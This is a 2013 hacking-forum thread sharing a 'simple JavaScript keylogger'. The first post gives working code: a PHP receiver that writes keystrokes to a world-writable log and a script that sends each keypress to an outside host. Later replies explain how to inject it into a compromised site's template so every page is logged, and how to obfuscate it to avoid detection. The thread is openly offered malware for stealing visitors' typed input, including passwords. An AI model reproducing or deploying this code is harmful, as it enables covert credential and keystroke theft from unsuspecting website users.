Page 1 of 1

Simple JavaScript Keylogger

PostPosted: Tue Jul 02, 2013 3:08 pm
by Th3_M4d_H4tt3r
To use this keylogger you need a file called "keylog.txt" with the permision code of 777
and a PHP file called keylogger.php containing a simple script:
Code: Select all
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>


and here is the keylogger file (keylogger.js):

Code: Select all
/*
Simple javascript keylogger by Th3_M4d_H4tt3r
*/

document.onkeypress = function(evt) {
   evt = evt || window.event
   key = String.fromCharCode(evt.charCode)
   if (key) {
      var http = new XMLHttpRequest();
      var param = encodeURI(key)
      http.open("POST","http://pyworm.noads.biz/keylogger.php",true);
      http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
      http.send("key="+param);
   }
}


to keylog a page use:
Code: Select all
<script src="http://yoursite.com/keylogger.js"></script>

Re: Simple JavaScript Keylogger

PostPosted: Tue Jul 02, 2013 11:42 pm
by counterhash
Th3_M4d_H4tt3r wrote:To use this keylogger you need a file called "keylog.txt" with the permision code of 777
and a PHP file called keylogger.php containing a simple script:
Code: Select all
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>


and here is the keylogger file (keylogger.js):

Code: Select all
/*
Simple javascript keylogger by Th3_M4d_H4tt3r
*/

document.onkeypress = function(evt) {
   evt = evt || window.event
   key = String.fromCharCode(evt.charCode)
   if (key) {
      var http = new XMLHttpRequest();
      var param = encodeURI(key)
      http.open("POST","http://pyworm.noads.biz/keylogger.php",true);
      http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
      http.send("key="+param);
   }
}


to keylog a page use:
Code: Select all
<script src="http://yoursite.com/keylogger.js"></script>

Why would you need this? Isn't it much simpler to just collect all their user info in a database which enter in the fields?

The only possible use I could think of would be embedded webpages or elements, but even then you're less likely to get found if you just deobfuscate and mod.

Re: Simple JavaScript Keylogger

PostPosted: Wed Jul 03, 2013 3:40 am
by Th3_M4d_H4tt3r
In windows you can execute a javascript .js file and it will run in the backround like vbscrypt.

this does have some advantages as the logs aree not storeed locally.

Re: Simple JavaScript Keylogger

PostPosted: Sat Jul 27, 2013 1:07 pm
by March001
Great but it's only will work for a single directory web pages not for whole website like if website has different directory then it won't be key log to second directory if we paste script in web home directory :(
As in my case i only can paste in web main home directory, i cannot access other directory of web (Permission Problem)

Would like to know how to key log whole website using your same script or other else?
is it possible?

Re: Simple JavaScript Keylogger

PostPosted: Sun Aug 04, 2013 1:09 pm
by Th3_M4d_H4tt3r
Yes, it is possible, php homepages aften have a template, including the image some links and all that. If you have shelled you target website (and have found the homepage-template), you may be able to paste in the HTML/JavaScript into the homepage template. EG: keylog the hole site. C:

Re: Simple JavaScript Keylogger

PostPosted: Mon Aug 05, 2013 5:40 pm
by March001
I did the same thing but this script doesn't for other directory might be SSL issue anyways thanks mate and is there anything to detect Visitor's Anti-virus information?

Re: Simple JavaScript Keylogger

PostPosted: Sat Aug 17, 2013 5:39 am
by Th3_M4d_H4tt3r
No antivirus issues whatsoever, also if you want to ubfuscate it go here:

http://javascriptobfuscator.com/

works great.